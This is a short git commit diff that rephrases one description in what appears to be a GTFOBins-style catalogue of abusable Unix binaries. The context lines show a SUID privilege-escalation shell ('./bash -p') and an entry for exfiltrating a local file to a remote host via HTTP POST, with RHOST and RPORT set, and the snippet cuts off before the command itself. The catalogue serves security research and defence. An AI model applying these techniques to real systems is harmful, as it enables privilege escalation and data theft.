Rephrase bash

This commit is contained in:
Emilio Pinna 2018-05-22 21:17:51 +01:00
parent e3d9c03c96
commit d9612ec461

View File

@ -7,7 +7,7 @@ functions:
suid-enabled:
- code: ./bash -p
upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file from the other end.
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end.
code: |
RHOST=10.0.0.1
RPORT=8000